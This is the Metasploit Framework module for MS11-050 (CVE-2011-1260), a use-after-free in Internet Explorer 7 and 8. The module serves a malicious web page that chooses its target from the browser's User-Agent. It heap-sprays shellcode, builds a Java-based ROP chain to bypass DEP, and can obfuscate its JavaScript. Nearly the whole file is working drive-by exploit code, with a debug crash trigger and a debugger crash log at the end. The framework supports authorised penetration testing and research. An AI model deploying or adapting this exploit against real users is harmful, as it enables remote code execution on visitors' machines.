metasploit-framework/modules/exploits/windows/browser/ms11_050_mshtml_cobjectelement.rb

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::HttpServer::HTML
	include Msf::Exploit::RopDb
	include Msf::Exploit::Remote::BrowserAutopwn
	autopwn_info({
		:ua_name    => HttpClients::IE,
		:ua_minver  => "7.0",
		:ua_maxver  => "8.0",
		:javascript => true,
		:os_name    => OperatingSystems::WINDOWS
	})

	def initialize(info={})
		super(update_info(info,
			'Name'           => "MS11-050 IE mshtml!CObjectElement Use After Free",
			'Description'    => %q{
					This module exploits a use-after-free vulnerability in Internet Explorer. The
				vulnerability occurs when an invalid <object> tag exists and other elements
				overlap/cover where the object tag should be when rendered (due to their
				styles/positioning). The mshtml!CObjectElement is then freed from memory because
				it is invalid. However, the mshtml!CDisplay object for the page continues to keep
				a reference to the freed <object> and attempts to call a function on it, leading
				to the use-after-free.

					Please note that for IE 8 targets, JRE (Java Runtime Environment) is required
				to bypass DEP (Data Execution Prevention).
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'd0c_s4vage',   #Discovery, poc
					'sinn3r',       #ROP (thx corelanc0d3r), Windows 7
					'bannedit'      #Windows 7
				],
			'References'     =>
				[
					['CVE', '2011-1260'],
					['OSVDB', '72950'],
					['MSB', 'MS11-050'],
					['URL', 'http://d0cs4vage.blogspot.com/2011/06/insecticides-dont-kill-bugs-patch.html']
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
					'InitialAutoRunScript' => 'migrate -f'
				},
			'Payload'        =>
				{
					'Space'    => 500,
					'BadChars' => "\x00\x09\x0a\x0d'\\",
					'StackAdjustment' => -3500
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Automatic', { } ],
					# In IE6 the mshtml!CObjectElement size is 0xac
					[
						'Internet Explorer 7 on XP SP3',
						{
							'Rop'        => false,
							'Ret'        => nil,         #Not required for non-ROP targets
							'TargetAddr' => 0x0c0c0c0c,  #For vtable
							'ObjSize'    => '0xB0',      #mshtml!CObjectElement size
							'Offset'     => '0x01',
						}
					],
					[
						'Internet Explorer 7 on Windows Vista',
						{
							'Rop'        => false,
							'Ret'        => nil,         #Not required for non-ROP targets
							'TargetAddr' => 0x0c0c0c0c,  #For vtable
							'ObjSize'    => '0xB0',      #mshtml!CObjectElement size
							'Offset'     => '0x01',
						}
					],
					[
						'Internet Explorer 8 on XP SP3',
						{
							'Rop'        => true,
							'Ret'        => 0x7C348B05,  #Stack pivot (xchg eax,esp; retn from java)
							'TargetAddr' => 0x0c0c0c0c,  #For vtable
							'ObjSize'    => '0xE0',      #mshtml!CObjectElement size
							'Offset'     => '0x5E2',
						}
					],
					[
						'Internet Explorer 8 on Windows 7',
						{
							'Rop'        => true,
							'Ret'        => 0x7C348B05,  #Stack pivot (xchg eax,esp; retn from java)
							'TargetAddr' => 0x0c0c0c0c,  #For vtable
							'ObjSize'    => '0xE0',      #mshtml!CObjectElement size
							'Offset'     => '0x5F4',
						}
					],
					[ 'Debug Target (Crash)', {} ],
				],
			'DisclosureDate' => "Jun 16 2011",
			'DefaultTarget'  => 0))

		register_options(
			[
				OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
			], self.class)
	end

	def auto_target(cli, request)
		agent = request.headers['User-Agent']

		if agent =~ /NT 5\.1/ and agent =~ /MSIE 7\.0/
			#Windows XP + IE7
			mytarget = targets[1]
		elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7\.0/
			#Windows Vista + IE7
			mytarget = targets[2]
		elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8\.0/
			#Windows XP + IE8
			mytarget = targets[3]
		elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 8\.0/
			#Windows 7 + IE8
			mytarget = targets[4]
		else
			mytarget = nil
		end

		return mytarget
	end

	def on_request_uri(cli, request)
		#Set default target
		mytarget = target
		debug = false

		if target.name == 'Automatic'
			mytarget = auto_target(cli, request)
			if mytarget.nil?
				agent = request.headers['User-Agent']
				print_error("Unknown User-Agent #{agent}")
				send_not_found(cli)
				return
			end
		elsif target.name =~ /Debug/
			debug = true
		end

		if debug
			data = <<-DATA
			<html>
			<body>
			<script language='javascript'>
			document.body.innerHTML += "<object align='right' hspace='1000'   width='1000'>TAG_1</object>";
			document.body.innerHTML += "<a id='tag_3' style='bottom:200cm;float:left;padding-left:-1000px;border-width:2000px;text-indent:-1000px' >TAG_3</a>";
			document.body.innerHTML += "AAAAAAA";
			document.body.innerHTML += "<strong style='font-size:1000pc;margin:auto -1000cm auto auto;' dir='ltr'>TAG_11</strong>";
			</script>
			</body>
			</html>
			DATA

			print_status("Triggering vulnerability (target: #{mytarget.name})...")
			send_response(cli, data, { 'Content-Type' => 'text/html' })
			return
		end

		if mytarget['Rop']
			p  = make_nops(44)             #Nops
			p << "\xeb\x04\xff\xff"        #Jmp over the pivot
			p << [mytarget.ret].pack('V')  #Stack pivot
			p << payload.encoded

			rop_payload = generate_rop_payload('java', p)
		end

		code = (rop_payload) ? rop_payload : payload.encoded

		# fill the vtable
		vtable = [mytarget['TargetAddr']].pack('V*')

		#Convert code format so we can unescape() in JavaScript
		code_js = Rex::Text.to_unescape(code, Rex::Arch.endian(target.arch))
		vtable_js = Rex::Text.to_unescape(vtable, Rex::Arch.endian(target.arch))

		#Extract string based on what the setup is
		if mytarget.name == 'Internet Explorer 8 on XP SP3'
			js_extract_str = "var block = shellcode.substring(2, 0x20000-0x21);"
		elsif mytarget.name == 'Internet Explorer 8 on Windows 7'
			js_extract_str = "var block = shellcode.substring(0, (0x7ffc0-6)/2);"
		else
			js_extract_str = "var block = shellcode.substring(0, (0x40000-6)/2);"
		end

		js = <<-JS
		function timedRefresh(timeoutPeriod) {
			setTimeout("location.reload(true);",timeoutPeriod);
		}

		function enable_lfh(heaplib_obj, obj_size, max) {
			var vtable = unescape("#{vtable_js}");
			while (vtable.length < obj_size) vtable += vtable;
			var obj = vtable.substring(0, (obj_size-6)/2);
			for (var i=1; i < max; i++) {
				heaplib_obj.alloc(obj);
			}
		}

		function heap_spray(heaplib_obj, offset) {
			var code = unescape("#{code_js}");
			var nops = unescape("%u0c0c%u0c0c");

			while (nops.length < 0x1000) nops += nops;
			offset = nops.substring(0, #{mytarget['Offset']});
			var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
			while (shellcode.length < 0x40000) shellcode += shellcode;
			#{js_extract_str}
			heaplib_obj.gc();
			for (var i2=0; i2 < 0x400-1; i2++) {
				heaplib_obj.alloc(block);
			}
		}

		heap = new heapLib.ie(0x20000);
		heap_spray(heap, #{mytarget['Offset']});
		enable_lfh(heap, #{mytarget['ObjSize']}, 0x200);

		document.body.innerHTML += "<object align='right' hspace='1000' width='1000'>TAG_1</object>";
		enable_lfh(heap, #{mytarget['ObjSize']}, 0x200);

		document.body.innerHTML += "<a id='tag_4' style='bottom:200cm;float:left;padding-left:-1000px;border-width:2000px;text-indent:-1000px' >TAG_3</a>";
		enable_lfh(heap, #{mytarget['ObjSize']}, 0x200);

		document.body.innerHTML += "BBBBBBBBBBBBBBBBBBBBBBB";
		enable_lfh(heap, #{mytarget['ObjSize']}, 0x500);

		document.body.innerHTML += "<strong style='font-size:1000pc;margin:auto -1000cm auto auto;' dir='ltr'>TAG_11</strong>";

		timedRefresh(2000);
		JS

		js = heaplib(js, {:noobfu => true})

		if datastore['OBFUSCATE']
			js = ::Rex::Exploitation::JSObfu.new(js)
			js.obfuscate
		end

		html = <<-HTML
		<html>
		<body>
		<script language='javascript'>
		#{js}
		</script>
		</body>
		</html>
		HTML

		print_status("Sending exploit (#{mytarget.name})...")
		send_response(cli, html, {'Content-Type'=>'text/html'})
	end
end


=begin
(b00.1ac): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0c0c0c0c ebx=0294b920 ecx=0bb300c8 edx=00000000 esi=020be380 edi=00000000
eip=6363fcc6 esp=020be354 ebp=020be36c iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
mshtml!CElement::Doc+0x2:
6363fcc6 8b5070          mov     edx,dword ptr [eax+70h] ds:0023:0c0c0c7c=????????
=end